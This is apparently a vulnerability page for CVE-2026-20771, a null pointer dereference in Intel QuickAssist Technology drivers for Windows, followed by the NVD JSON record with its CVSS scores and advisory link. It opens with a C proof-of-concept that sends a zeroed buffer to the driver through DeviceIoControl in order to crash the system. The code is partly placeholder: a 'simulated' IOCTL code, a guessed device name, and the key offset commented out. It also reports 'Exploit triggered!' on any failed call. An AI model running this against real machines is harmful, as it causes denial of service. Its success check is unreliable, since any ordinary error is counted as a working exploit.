CVE-2026-20771

#include <windows.h> #include <stdio.h> // Simulated IOCTL code for the vulnerable function #define VULNERABLE_IOCTL 0x222003 int main() { // Attempt to open the device handle HANDLE hDevice = CreateFileA("\\\\.\\IntelQATDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("Failed to open device. Error: %d\n", GetLastError()); return 1; } // Prepare input buffer simulating the null pointer dereference trigger // The vulnerable driver expects a valid pointer but receives NULL/invalid data BYTE inBuffer[1024]; memset(inBuffer, 0, sizeof(inBuffer)); // Manipulate buffer to pass NULL pointer equivalent to the driver // Offset depends on specific driver structure // *(DWORD*)(inBuffer + 0x10) = 0; DWORD bytesReturned; BOOL result = DeviceIoControl( hDevice, VULNERABLE_IOCTL, inBuffer, sizeof(inBuffer), // Input buffer NULL, 0, // Output buffer &bytesReturned, NULL ); if (!result) { printf("Exploit triggered! DeviceIoControl failed with error: %d\n", GetLastError()); // Expected behavior: System crash or BSOD due to null pointer dereference } else { printf("Call succeeded, vulnerability not triggered.\n"); } CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2026-20771", "sourceIdentifier": "[email protected]", "published": "2026-05-12T17:16:18.060", "lastModified": "2026-05-15T20:04:13.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference for some Intel(R) QAT software drivers for Windows before version 1.13 within Ring 3: User Applications may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (low), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:intel:quickassist_technology:*:*:*:*:*:windows:*:*", "versionEndExcluding": "1.13.0-0021", "matchCriteriaId": "33320669-6E22-4E76-988F-0FD0E3184A80"}]}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01387.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}